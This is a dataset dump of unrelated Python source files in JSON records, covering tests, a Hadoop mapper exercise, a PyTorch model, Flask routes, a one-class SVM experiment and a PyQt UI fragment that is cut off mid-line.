pytest.raises(ValueError):\n tp.File(str(uuid.uuid4()))\n assert tp.Dir(os.path.dirname(__file__)) == os.path.dirname(__file__)\n with pytest.raises(ValueError):\n tp.Dir(str(uuid.uuid4()))\n assert tp.ExistingPath(__file__) == __file__\n assert tp.ExistingPath(os.path.dirname(__file__)) == os.path.dirname(\n __file__)\n with pytest.raises(ValueError):\n tp.ExistingPath(str(uuid.uuid4()))\n try:\n home = os.environ['HOME']\n\n def _reset_home():\n os.environ['HOME'] = home\n\n request.add_finalizer(_reset_home)\n except KeyError:\n pass\n os.environ['HOME'] = '/home/bob'\n assert tp.Path('~/test') == '/home/bob/test'\n\n\ndef test_none_type():\n \"\"\"Verify that NoneType is type(None).\"\"\"\n assert tp.NoneType is type(None)\n\n\ndef test_singleton():\n \"\"\"Test that a singleton only allows a single instance of a class.\"\"\"\n @six.add_metaclass(tp.Singleton)\n class TestClass(object):\n pass\n\n assert TestClass() is TestClass()\n\n\ndef test_uninstantiable():\n \"\"\"Test that an uninstantiable class cannot be instantiated.\"\"\"\n @six.add_metaclass(tp.Uninstantiable)\n class TestClass(object):\n pass\n\n with pytest.raises(TypeError):\n TestClass()\n","sub_path":"tests/test_types.py","file_name":"test_types.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"503576856","text":"#!/usr/bin/env python\n\"\"\"\nMapper partitions based on first letter in word.\nINPUT:\n word \\t count\nOUTPUT:\n partitionKey \\t word \\t count \n\"\"\"\nimport re\nimport sys\n \ndef getPartitionKey(word,count):\n \"\"\" \n Helper function to assign partition key ('A', 'B', or 'C').\n Args: word (str) ; count (int)\n \"\"\"\n ############ YOUR CODE HERE ##########\n if count > 8: # <--- SOLUTION --->\n return 'B' # <--- SOLUTION --->\n elif count > 4: # <--- SOLUTION --->\n return 'C' # <--- SOLUTION --->\n else: # <--- SOLUTION --->\n return 'A' # <--- SOLUTION --->\n \n # provided implementation: (run this first, then make your changes in part e)\n if word[0] < 'h': \n return 'A'\n elif word[0] < 'p':\n return 'B'\n else:\n return 'C'\n ############ (END) YOUR CODE #########\n \n# read from standard input\nfor line in sys.stdin: \n word, count = line.strip().split()\n count = int(count)\n partitionKey = getPartitionKey(word, count) \n print(f\"{partitionKey}\\t{word}\\t{count}\")","sub_path":"LiveSessionMaterials/wk03Demo_HadoopShuffle/master/PartitionSort/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"108328851","text":"# OOP for collecting songs in a list.\n# Each question will categorize the song in a list of rock or country\n\n# The two lists which will be used for placing the songs\nrock = []\ncountry = []\n\n\n# Defining the function\ndef collect_songs():\n song = \"Enter a song.\"\n ask = \"Type r or c. q to quit\"\n\n # While True will be used to keep the loop going of adding\n while True:\n genre = input(ask)\n if genre == \"q\":\n print(\"The program has been terminated.\")\n break\n\n if genre == \"r\":\n # If the request is to add a rock song the next line will be executed.\n rk = input(song)\n # With the next line the song will be added to the rock list. Hence the append function.\n rock.append(rk)\n\n elif genre == \"c\":\n cy = input(song)\n country.append(cy)\n\n else:\n print(\"Invalid input, please choose between r or c. Press q and confirm with enter to quit.\")\n\n print(rock)\n print(country)\n\n\ncollect_songs()\n","sub_path":"part_ii_intro_to_oop/collect_songs.py","file_name":"collect_songs.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"254808381","text":"import numpy as np\nimport torch\nfrom .base_model import BaseModel\nfrom . import networks\nfrom .patchnce import PatchNCELoss\nimport util.util as util\n\n\nclass AttentionModel(BaseModel):\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n # set defaults\n parser.set_defaults(TODO)\n if is_train:\n parser.add_argument(TODO)\n parser.set_defaults(gan_mode=\"lsgan\") \n return parser\n\n def __init__(self, opt):\n BaseModel.__init__(self, opt)\n self.loss_names = ['D']\n self.visual_names = ['input', 'output']\n self.model_names = ['D']\n # self.netD = networks.define_D(opt.output_nc, opt.ndf, opt.netD, opt.n_layers_D, opt.normD, opt.init_type, opt.init_gain, opt.no_antialias, self.gpu_ids, opt)\n self.netD = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.normG, not opt.no_dropout,\n opt.init_type, opt.init_gain, opt.no_antialias, opt.no_antialias_up, self.gpu_ids,\n opt)\n self.layers = [2, 6, 10, 14]\n if self.isTrain:\n self.criterionLoss = networks.GANLoss(opt.gan_mode).to(self.device)\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr, betas=(opt.beta1, opt.beta2))\n self.optimizers = [self.optimizer_D]\n\n # Our program will automatically call to define schedulers, load networks, and print networks\n\n def set_input(self, input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n input: a dictionary that contains the data itself and its metadata information.\n \"\"\"\n self.input_imgs = input[0]\n self.image_classes = input[1]\n\n def forward(self):\n \"\"\"Run forward pass. This will be called by both functions and .\"\"\"\n self.output = self.netD(self.input_imgs) # generate output image given the input data_A\n\n def optimize_parameters(self):\n \"\"\"Update network weights; it will be called in every training iteration.\"\"\"\n self.forward() # first call forward to calculate intermediate results\n self.optimizer_D.zero_grad() # clear network G's existing gradient\n \n self.loss_D = 0\n for i in range(self.opt.batch_size):\n self.loss_D += self.criterionLoss(self.output[i], self.image_classes[i]).mean()\n self.loss_D /= self.opt.batch_size\n self.loss_D.backward()\n self.optimizer_D.step() # update gradients for network G\n\n def generate_attention(self):\n \"Return list of channel-wise squared mean feature maps\"\n # feat_maps = self.netD.attention_forward(self.input_imgs, self.layers)\n feat_maps = self.netD(self.input_imgs, self.layers, encode_only=True)\n for i in range(len(feat_maps)):\n print(feat_maps[i].shape)\n feat_maps[i] = feat_maps[i].pow(2).mean(1)\n \n for feat in feat_maps:\n print(feat.shape)\n return feat_maps\n","sub_path":"models/attention_model.py","file_name":"attention_model.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"514296113","text":"import card\nimport random\n\n\nclass Deck:\n def __init__(self):\n self.__cards = []\n for suit in card.suits:\n for rank in card.ranks:\n new_card = card.Card(suit, rank)\n self.__cards.append(new_card)\n\n @staticmethod\n def _get_shuffle_index(card_index):\n while True:\n shuffle_index = random.randint(0, 51)\n if shuffle_index != card_index:\n return shuffle_index\n\n def shuffle(self):\n for card_one_index in range(0, 52): # between 0 to 51 inclusive\n card_two_index = Deck._get_shuffle_index(card_one_index)\n card_one = self.__cards[card_one_index] # hold card_one reference\n card_two = self.__cards[card_two_index] # hold card_two reference\n self.__cards.remove(card_one)\n self.__cards.remove(card_two)\n self.__cards.insert(card_one_index, card_two)\n self.__cards.insert(card_two_index, card_one)\n\n def deal(self, num_of_cards):\n if num_of_cards <= 0:\n raise AssertionError # num_of_cards cannot be negative or zero\n result = []\n while num_of_cards > 0:\n result.append(self.__cards.pop()) # deal a card into result list, can raise IndexError if deck is empty\n num_of_cards -= 1\n return result\n\n def _print(self):\n print('The deck is:')\n for card in self.__cards:\n print(card)\n\n\n\n\n","sub_path":"08-Milestone Project-2/BlackJackV1/deck.py","file_name":"deck.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"302843136","text":"from flask import Blueprint, request, jsonify\nfrom sqlalchemy.orm import joinedload\nfrom ..models import User, Follow, db\n\n\n# following = /:id/following\n# follows = /:id\n\nfollow_routes = Blueprint(\"follow\", __name__)\n\n# users who follow user of \n@follow_routes.route('/')\ndef getFollows(id):\n follows = Follow.query.filter(Follow.user_followed_id == id).all()\n\n followsList = []\n for follower in follows:\n user = User.query.filter(follower.user_id == User.id).first()\n followsList.append(user.to_dict())\n return {\"users\": followsList}\n\n@follow_routes.route('/following')\ndef getFollowing(id):\n follows = Follow.query.filter(Follow.user_id == id).all()\n\n followsList = []\n for follower in follows:\n user = User.query.filter(follower.user_followed_id == User.id).first()\n followsList.append(user.to_dict())\n return {\"users\": followsList}\n\n@follow_routes.route('', methods=[\"POST\"])\ndef followUser():\n data = request.json\n exists = Follow.query.filter(Follow.user_id == data['userId']).filter(Follow.user_followed_id == data['userFollowedId']).first()\n if exists:\n return {\"error\": \"Already Follow!\"}\n follow = Follow(user_id = data['userId'], user_followed_id = data['userFollowedId'])\n db.session.add(follow)\n db.session.commit()\n return follow.to_dict()\n\n@follow_routes.route('', methods = [\"DELETE\"])\ndef deleteFollow():\n data = request.json\n print(data)\n exists = Follow.query.filter(Follow.user_id == data['userId']).filter(Follow.user_followed_id == data['userFollowedId']).first()\n print(exists.to_dict())\n if not exists:\n return {\"error\": \"Doesn't follow!\"}\n follow = Follow.query.filter(Follow.user_id == data['userId']).filter(Follow.user_followed_id == data['userFollowedId']).first()\n db.session.delete(follow)\n db.session.commit()\n return follow.to_dict()\n","sub_path":"app/api/follow_routes.py","file_name":"follow_routes.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"208628699","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport argparse\nimport os\nimport random \nimport pickle\nimport json\nfrom imblearn.over_sampling import RandomOverSampler\nfrom sklearn import svm\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics.pairwise import pairwise_distances\n\nclass Bunch(object):\n def __init__(self, adict):\n self.__dict__.update(adict)\n\n\ndef extract_args_from_json(config_file, args_dict):\n with open(config_file) as f:\n summary_dict = json.load(fp=f)\n\n for key in summary_dict.keys():\n args_dict[key] = summary_dict[key]\n\n return args_dict\n\n\ndef load_MiniImageNet():\n\n \"\"\" load the MiniImageNet tasks.\n\n Returns\n -------\n mtl_train_tasks : dict\n meta-training tasks.\n val_tasks : list\n meta-validation task.\n test_tasks : list\n meta-testing tasks.\n\n \"\"\"\n\n base_path = '/home/USER/Documents'\n if (not (os.path.exists(base_path))):\n base_path = '/home/ubuntu/Projects'\n if (not (os.path.exists(base_path))):\n base_path = '/home/USER/Projects'\n if (not (os.path.exists(base_path))):\n base_path = '/home/USER/Projects'\n\n data_path = base_path + '/MAML/input_data/miniImageNet/'\n\n test_tasks_file = open(data_path + 'miniImageNet_test_tasks.txt', 'rb')\n test_tasks = pickle.load(test_tasks_file)\n\n return test_tasks\n\n\n\ndef initialize_ocsvm(kernel, nu, gamma, **kwargs):\n\n if kernel in ('linear', 'poly', 'rbf', 'sigmoid'):\n kernel = kernel\n else:\n kernel = 'precomputed'\n\n ocsvm = svm.OneClassSVM(kernel=kernel, nu=nu, gamma=gamma,**kwargs)\n return ocsvm\n\n\ndef train(ocsvm, X_train, X_test, Y_test, kernel, nu, GridSearch=True, **kwargs):\n\n if X_train.ndim > 2:\n X_train_shape = X_train.shape\n X_train = X_train.reshape(X_train_shape[0], np.prod(X_train_shape[1:]))\n else:\n X_train = X_train\n\n if kernel in ('DegreeKernel', 'WeightedDegreeKernel'):\n # get_kernel_matrix(kernel=kernel, X_train=X_train, **kwargs)\n # svm.fit(K_train)\n print('unexpected behaviour')\n else:\n if GridSearch and kernel == 'rbf':\n\n # use grid search cross-validation to select gamma\n print(\"Using GridSearchCV for hyperparameter selection...\")\n\n # sample small hold-out set from test set for hyperparameter selection. Save as val set.\n \n n_test_set = len(X_test)\n n_val_set = int(0.1 * n_test_set)\n n_test_out = 0\n n_test_norm = 0\n n_val_out = 0\n n_val_norm = 0\n while (n_test_out == 0) | (n_test_norm == 0) | (n_val_out == 0) | (n_val_norm ==0):\n perm = np.random.permutation(n_test_set)\n X_val = X_test[perm[:n_val_set]]\n y_val = Y_test[perm[:n_val_set]]\n # only accept small test set if AUC can be computed on val and test set\n n_test_out = np.sum(Y_test[perm[:n_val_set]])\n n_test_norm = np.sum(Y_test[perm[:n_val_set]] == 0)\n n_val_out = np.sum(Y_test[perm[n_val_set:]])\n n_val_norm = np.sum(Y_test[perm[n_val_set:]] == 0)\n\n X_test = X_test[perm[n_val_set:]]\n Y_test = Y_test[perm[n_val_set:]]\n n_val = len(y_val)\n n_test_set = len(Y_test)\n\n val_scores = np.zeros((len(y_val), 1))\n test_scores = np.zeros((len(Y_test), 1))\n\n cv_auc = 0.0\n cv_acc = 0\n cv_f1 = 0\n\n g_best = 0.1\n for gamma in np.logspace(-10, -1, num=10, base=2):\n\n # train on selected gamma\n cv_svm = svm.OneClassSVM(kernel='rbf', nu=nu, gamma=gamma)\n cv_svm.fit(X_train)\n\n # predict on small hold-out set\n val_acc, _, _, _, val_f1_score, val_auc_roc = predict(cv_svm, X_val, y_val, kernel)\n\n # save model if AUC on hold-out set improved\n if val_f1_score > cv_f1:\n # print('gamma set to: ', g_best)\n ocsvm = cv_svm\n g_best = gamma\n cv_auc = val_auc_roc\n cv_f1 = val_f1_score\n\n # save results of best cv run\n # diag['val']['auc'] = cv_auc\n # diag['val']['acc'] = cv_acc\n\n oc_svm = svm.OneClassSVM(kernel='rbf', nu=nu, gamma=g_best)\n \n\n ocsvm.fit(X_train)\n\n\n else:\n # if rbf-kernel, re-initialize svm with gamma minimizing the\n # numerical error\n if kernel == 'rbf':\n gamma = 1 / (np.max(pairwise_distances(X_train)) ** 2)\n # ocsvm = svm.OneClassSVM(kernel='rbf', nu=nu, gamma=gamma)\n\n ocsvm.fit(X_train)\n gamma = gamma\n\n return ocsvm\n\n\n\ndef predict(ocsvm, X, y, kernel, **kwargs):\n\n # reshape to 2D if input is tensor\n if X.ndim > 2:\n X_shape = X.shape\n X = X.reshape(X_shape[0], np.prod(X_shape[1:]))\n\n if kernel in ('DegreeKernel', 'WeightedDegreeKernel'):\n # get_kernel_matrix(kernel=kernel, which_set=which_set, **kwargs)\n # if which_set == 'train':\n # scores = (-1.0) * ocsvm.decision_function(K_train)\n # y_pred = (ocsvm.predict(K_train) == -1) * 1\n # if which_set == 'test':\n # scores = (-1.0) * ocsvm.decision_function(K_test)\n # y_pred = (ocsvm.predict(K_test) == -1) * 1\n print('unexpected behaviour')\n\n else:\n scores = (-1.0) * ocsvm.decision_function(X)\n y_pred = ocsvm.predict(X)\n\n y_pred[y_pred == 1.0] = 0.0\n y_pred[y_pred == -1.0] = 1.0\n\n scores_flattened = scores.flatten()\n acc = 100.0 * sum(y == y_pred) / len(y)\n\n TP = np.count_nonzero(y_pred * y)\n TN = np.count_nonzero((y_pred - 1) * (y - 1))\n FP = np.count_nonzero(y_pred* (y - 1))\n FN = np.count_nonzero((y_pred-1) *y)\n\n if(TP+FP == 0):\n prec = 0.0\n else:\n prec = TP/(TP + FP) \n\n rec = TP / (TP + FN)\n spec = TN / (TN + FP)\n\n if(prec+rec == 0):\n f1_score = 0.0\n else:\n f1_score = 2*prec*rec/(prec + rec)\n\n # if sum(y) > 0:\n auc_roc = roc_auc_score(y, scores.flatten())\n \n # if which_set == 'test':\n # rho = -svm.intercept_[0]\n\n return acc, prec, rec, spec, f1_score, auc_roc\n\n\ndef main(args):\n\n\n seed = 123\n random.seed(seed)\n np.random.seed(seed)\n tf.set_random_seed(seed)\n\n K=args.K\n\n test_tasks = load_MiniImageNet()\n \n test_finetune_normal_indexes_list, test_finetune_anomalous_indexes_list = [], []\n for i in range (len(test_tasks)):\n test_finetune_normal_indexes_list.append(list(np.where(test_tasks[i]['Y_inner'] == 0)[0]))\n test_finetune_anomalous_indexes_list.append(list(np.where(test_tasks[i]['Y_inner'] == 1)[0]))\n \n acc_list, prec_list, rec_list, spec_list, f1_list, auc_roc_list = [], [], [], [], [], []\n\n\n kernel = 'rbf' \n nu = 0.1\n GridSearch = True\n gamma = 'scale'\n\n n_finetune_sets = 20\n\n\n for test_task_idx, test_task in enumerate(test_tasks):\n normal_indexes = test_finetune_normal_indexes_list[test_task_idx]\n anomalous_indexes = test_finetune_normal_indexes_list[test_task_idx]\n for fset_idx in range(n_finetune_sets):\n finetune_X, finetune_Y = test_task[\"X_inner\"], np.expand_dims(test_task[\"Y_inner\"], -1)\n # sampled for the present finetune set\n finetune_normal_idxs = random.sample(normal_indexes, K) \n finetune_indexes = []\n \n finetune_indexes += finetune_normal_idxs\n\n finetune_X = finetune_X[finetune_indexes]\n finetune_Y = finetune_Y[finetune_indexes]\n\n \n finetune_X = finetune_X.reshape(finetune_X.shape[0], -1)\n\n pca = PCA(0.95)\n # print(finetune_X.shape)\n pca.fit(finetune_X)\n finetune_X = pca.transform(finetune_X)\n # print(finetune_X.shape)\n test_X = np.reshape(test_task['X_outer'], (test_task['X_outer'].shape[0], -1))\n test_X = pca.transform(test_X)\n ocsvm = initialize_ocsvm(kernel, nu, gamma)\n \n ocsvm = train(ocsvm, finetune_X, test_X, np.squeeze(test_task['Y_outer']), kernel, nu, GridSearch)\n # print('decision was made for gamma = ', ocsvm.gamma)\n acc, prec, rec, spec, f1_score, auc_roc = predict(ocsvm, test_X, np.squeeze(test_task['Y_outer']), kernel)\n print('test_task: ', test_task_idx,\n 'f_set: ', fset_idx, \n ' acc ', acc,\n ' prec ', prec,\n ' rec ', rec,\n ' spec ', spec,\n ' f1_score ', f1_score, \n ' auc_roc ', auc_roc)\n\n acc_list.append(acc)\n prec_list.append(prec)\n rec_list.append(rec)\n spec_list.append(spec)\n f1_list.append(f1_score)\n auc_roc_list.append(auc_roc)\n\n\n test_results_dict = {}\n test_results_dict['acc'] = acc_list\n test_results_dict['prec'] = prec_list\n test_results_dict['rec'] = rec_list\n test_results_dict['spec'] = spec_list\n test_results_dict['f1'] = f1_list\n test_results_dict['auc_roc'] = auc_roc_list\n\n\n results_dir_path = './results/'\n if (not (os.path.exists(results_dir_path))):\n os.mkdir(results_dir_path)\n filename = args.summary_dir + '_K_' + str(K) +'.txt'\n with open(results_dir_path+filename, 'wb') as file:\n pickle.dump(test_results_dict, file)\n\n \n print('average metrics')\n\n print(\n ' acc : ',\n np.mean(acc_list),\n ' prec : ',\n np.mean(prec_list),\n ' recall : ',\n np.mean(rec_list),\n ' specificity : ',\n np.mean(spec_list),\n ' f1_score : ',\n np.mean(f1_list),\n ' auc_roc : ',\n np.mean(auc_roc_list))\n\n print('min metrics')\n\n print(\n ' acc : ',\n np.amin(acc_list),\n ' prec : ',\n np.amin(prec_list),\n ' recall : ',\n np.amin(rec_list),\n ' specificity : ',\n np.amin(spec_list),\n ' f1_score : ',\n np.amin(f1_list),\n ' auc_roc : ',\n np.amin(auc_roc_list))\n\n print('max metrics')\n\n print(\n ' acc : ',\n np.amax(acc_list),\n ' prec : ',\n np.amax(prec_list),\n ' recall : ',\n np.amax(rec_list),\n ' specificity : ',\n np.amax(spec_list),\n ' f1_score : ',\n np.amax(f1_list),\n ' auc_roc : ',\n np.amax(auc_roc_list))\n\n n_test_tasks = len(acc_list)\n print('ci95 metrics - number of test tasks :', n_test_tasks)\n\n print(\n ' acc : ',\n 1.96*np.std(acc_list)/np.sqrt(n_test_tasks),\n ' prec : ',\n 1.96*np.std(prec_list)/np.sqrt(n_test_tasks),\n ' recall : ',\n 1.96*np.std(rec_list)/np.sqrt(n_test_tasks),\n ' specificity : ',\n 1.96*np.std(spec_list)/np.sqrt(n_test_tasks),\n ' f1_score : ',\n 1.96*np.std(f1_list)/np.sqrt(n_test_tasks),\n ' auc_roc : ',\n 1.96*np.std(auc_roc_list)/np.sqrt(n_test_tasks)\n )\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=('supervised learning on one task (one MNIST digit) /' \n 'purpose: benchmark with Model agnostic meta learning' \n ' with MNIST'))\n \n parser.add_argument(\n '-K',\n type=int,\n metavar='',\n help='number of data points sampled for training')\n parser.add_argument(\n '-cir_train',\n type=float,\n metavar='',\n help='percentage of positive examples')\n parser.add_argument(\n '-test_task_idx',\n type=int,\n metavar='',\n help='index of the task to be learned') \n parser.add_argument(\n '-val_task_idx',\n type=int,\n metavar='',\n help='index of the val task - only needed to load the dataset') \n parser.add_argument('-config_file', \n type=str, \n default=\"None\")\n\n\n args = parser.parse_args()\n\n args_dict = vars(args)\n if args.config_file is not \"None\":\n args_dict = extract_args_from_json(args.config_file, args_dict)\n\n for key in list(args_dict.keys()):\n\n if str(args_dict[key]).lower() == \"true\":\n args_dict[key] = True\n elif str(args_dict[key]).lower() == \"false\":\n args_dict[key] = False\n\n\n args = Bunch(args_dict)\n\n main(args)\n","sub_path":"MAMLs_Reptiles/MiniImageNet/OCC_baselines/OCSVM/ocsvm_main.py","file_name":"ocsvm_main.py","file_ext":"py","file_size_in_byte":12621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"199383842","text":"# coding:utf-8\n# input and preprocess。Train 包括完整的train evaluation test, test 指的是完全相同的数据类型代入计算,predict指的是没有标签。\ntest_keyword = ['aha']\npredict_keyword = ['testdata']\nbase = '../data/' \n\n# 采样\nsample_rate = 5 # 单位是毫秒 ,>=1\n\n# Preprocessing: PCA Gaussian FFT\nwindow_length, overlap_window = 20, 20 # 窗口和滑动大小\ntrain_data_rate = 0.1 # 使用处理后数据比例,用于减小训练数据使用的样本数(训练预测阶段)\nsaved_dimension_after_pca, sigma = 20, 500 \nuse_gauss, use_pca, use_fft = True, False, True # True\nwhether_shuffle_train_and_test = True\n\n# Model detail \nepochs, n_splits = 50 , 10\nbatch_size, train_batch_size = 2, 2000 # essential,batch size 其实是LSTM的N_step\n\ntest_ratio, evaluation_ratio = 0.2, 0.1 # 划分训练、测试、验证集\nTRAINABLE = True\nMAX_NB_VARIABLES = saved_dimension_after_pca if use_pca else window_length * 2\nunits = 50 # int(MAX_NB_VARIABLES / 2)\n\n### 此处添加文件相关信息 ###\ntrain_keyword = ['05_work_word', '06_work_excel', '07_work_ppt', '08_social_wechat', '09_social_qq', '13_game_zuma', '14_game_candy', '15_game_minecraft', '16_picture_win3d', '17_chrome_surfing', '18_firefox_surfing', '19_chrome_gmail_work', '20_chrome_twitter', '22_chrome_amazon', '23_chrome_agar']\ntrain_folder = '../data//input//apps/'\ntest_folder = '../data//input//apps/'\npredict_folder = '../data//input//apps/'\ntrain_tmp = '../data//tmp/apps//tmp/train/'\ntest_tmp = '../data//tmp/apps//tmp/test/'\npredict_tmp = '../data//tmp/apps//tmp/predict/'\ntrain_tmp_test = '../data//tmp/apps//tmp/train/test/'\nmodel_folder = '../data//tmp/apps//model/'\nNB_CLASS = 15\n","sub_path":"src V4.0 Rewrite for joint experiments/o2_config.py","file_name":"o2_config.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"167969658","text":"def lang(n):\n if n == 0:\n print(0)\n else:\n n1 = int(n**0.5)\n if n1**2 == n:\n print(int(n1), end=' ')\n else:\n lang(n - (n // n**0.5)**2)\n print(int(n // n**0.5), sep=' ', end=' ')\n\n\nn = int(input())\nlang(n)\n","sub_path":"doneTask_04/Task21_recLangrangeiMyNotCorrect.py","file_name":"Task21_recLangrangeiMyNotCorrect.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"366456792","text":"# -*- coding:utf-8 -*-\nfrom __future__ import unicode_literals\nfrom objectpath import *\nfrom robot.api import logger\nimport json\nimport sys\nimport copy\n\n\nclass JsonValue:\n def __init__(self):\n self.__value_json = None\n self._expect_json = None\n self.__actual_json = None\n self.base_path = \"$.\"\n\n def _equal_field(self, path, value, value1):\n __path = copy.deepcopy(path)\n\n if isinstance(value, list):\n self._get_tree_value(path)\n for i in range(len(value)):\n path = __path + \"[\" + str(i) + \"]\"\n self._equal_field(path, value[i], self._tree_value)\n elif isinstance(value, dict):\n self._get_tree_value(path)\n for k, v in value.iteritems():\n path = \".\".join((__path, k))\n self._equal_field(path, v, self._tree_value)\n else:\n if isinstance(value1, list):\n if value not in value1:\n msg = 'JSON查询结果比较,值{0}不在list {1} 内部'.format(value, value1)\n self._assert_error(msg)\n else:\n self._get_tree_value(path)\n if self._tree_value != value:\n msg = 'JSON查询结果比较:\\n路径{0}返回值为:{1},期望:{2}'.format(path, self._tree_value, value)\n self._assert_error(msg)\n\n def _get_tree_value(self, path):\n\n self._tree_value = self._tree.execute(path)\n\n def __convert_json(self, value_str):\n\n if isinstance(value_str, (str, unicode)):\n\n self.__value_json = json.loads(value_str, encoding='utf-8')\n\n elif isinstance(value_str, dict):\n\n self.__value_json = value_str\n\n else:\n\n logger.error(\"期望结果的数据类型错误\")\n\n sys.exit()\n\n def get_result_value(self, result, path):\n \"\"\"\n result : 输入值 \\n\n\n path : 期望获取的值 path \\n\n\n example : \\n\n result: {\"a\":\"b\",\"b\":[\"a\",\"b\",] , \"c\" :{\"a\":\"b\"} ,\"d\":{ \"c\":[1,2,3] } } \\n\n except result : d - c 第二个值 , 注:从 0 开始 \\n\n\n | ${x}= | get_result_value | result | d.c[2] | \\n\"\n\n \"\"\"\n # 组合 path\n path = self.base_path + path\n\n # 转换 类型\n self.__convert_json(result)\n\n result_value = Tree(self.__value_json).execute(path)\n\n return result_value\n\n def assert_equal_json(self, actual_json, expect_json):\n \"\"\"\n actual_json : 实际结果 为字符串 \\n\n expect_json : 期望结果 \\n\n example \\n\n 实际结果: {\"a\":\"b\",\"b\":[\"a\",\"b\",] , \"c\" :{\"a\":\"b\"} ,\"d\":{ \"c\":[1,2,3] } } \\n\n 若期望比较: b 中的第二个元素 值是否为 b \\n\n expect_json 写法:{\"b[1]\":\"b\"} \\n\n 若期望比较: c 中的 a 元素是否 为 b \\n\n expect_json 写法:{\"c.a\":\"b\"} \\n\n 若期望比较: d 中的 c 列表中的 第二个元素 为 3 \\n\n expect_json 写法:{\"d.c[2]\":3} \\n\n example : \\n\n\n | assert_equal_json | actual_json | expect_json | \\n\"\n\n \"\"\"\n if '{' not in expect_json and actual_json == expect_json:\n return\n\n self.__convert_json(actual_json)\n\n self.__actual_json = self.__value_json\n\n self.__convert_json(expect_json)\n\n self._expect_json = self.__value_json\n\n self._tree = Tree(self.__actual_json)\n\n for key, value in self._expect_json.iteritems():\n base_path = self.base_path + key\n\n self._equal_field(base_path, value, self._expect_json)\n\n def _assert_error(self, msg):\n\n raise AssertionError(msg)","sub_path":"Public/Libary/CommonLib/JsonValue.py","file_name":"JsonValue.py","file_ext":"py","file_size_in_byte":3738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"125907422","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui \nimport sys\nimport json\nfrom http import *\n\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n \nclass AdminBoardSafe(QtGui.QWidget):\n def __init__(self,parent=None):\n super(AdminBoardSafe,self).__init__(parent) \n #self.setupUi(self)\n\n def AddAdminTagSafe(self):\n self.adminTagSafeLogo = QtGui.QWidget(self.adminTagSafeBkg)\n self.adminTagSafeLogo.setGeometry(QtCore.QRect(40, 10, 70, 60))\n self.adminTagSafeLogo.setObjectName(_fromUtf8(\"adminTagSafeLogo\"))\n self.adminTagSafeLogo.setStyleSheet(_fromUtf8(\"border-image: url(:/images/admin_safe_logo.png);\"))\n\n self.adminTagSafeTitle = QtGui.QWidget(self.adminTagSafeBkg)\n self.adminTagSafeTitle.setGeometry(QtCore.QRect(120, 10, 200, 60))\n self.adminTagSafeTitle.setObjectName(_fromUtf8(\"adminTagSafeTitle\"))\n self.adminTagSafeTitle.setStyleSheet(_fromUtf8(\"border-image: url(:/images/admin_safe_title.png);\"))\n \n self.adminTagSafeSpace1 = QtGui.QWidget(self.adminTagSafeBkg)\n self.adminTagSafeSpace1.setGeometry(QtCore.QRect(0, 74, 10000, 1))\n self.adminTagSafeSpace1.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_bg_disable.png);\"))\n self.adminTagSafeSpace1.setObjectName(_fromUtf8(\"adminTagSafeSpace1\"))\n\n self.adminTagSafeSpace2 = QtGui.QWidget(self.adminTagSafeBkg)\n self.adminTagSafeSpace2.setGeometry(QtCore.QRect(0, 112, 10000, 1))\n self.adminTagSafeSpace2.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_bg_disable.png);\"))\n self.adminTagSafeSpace2.setObjectName(_fromUtf8(\"adminTagSafeSpace2\"))\n\n self.adminTagSafeModeTxet = QtGui.QLabel(self.adminTagSafeBkg)\n self.adminTagSafeModeTxet.setGeometry(QtCore.QRect(40, 80, 91, 30))\n self.adminTagSafeModeTxet.setObjectName(_fromUtf8(\"adminTagSafeModeTxet\")) \n self.adminTagSafeModeTxet.setStyleSheet(_fromUtf8(\"border-image: url(:/images/btn_no_frame.png);\"))\n self.adminTagSafeModeTxet.setText(_translate(\"adminTagSafeModeTxet\", \"当前模式\", None))\n self.adminTagSafeModeTxet.setAlignment(QtCore.Qt.AlignVCenter | QtCore.Qt.AlignCenter)\n\n # 当前模式\n self.adminTagSafeMode = QtGui.QPushButton(self.adminTagSafeBkg)\n self.adminTagSafeMode.setGeometry(QtCore.QRect(140, 80, 140, 30))\n self.adminTagSafeMode.setObjectName(_fromUtf8(\"adminTagSafeMode\")) \n self.adminTagSafeMode.setStyleSheet(_fromUtf8(\"border-image: 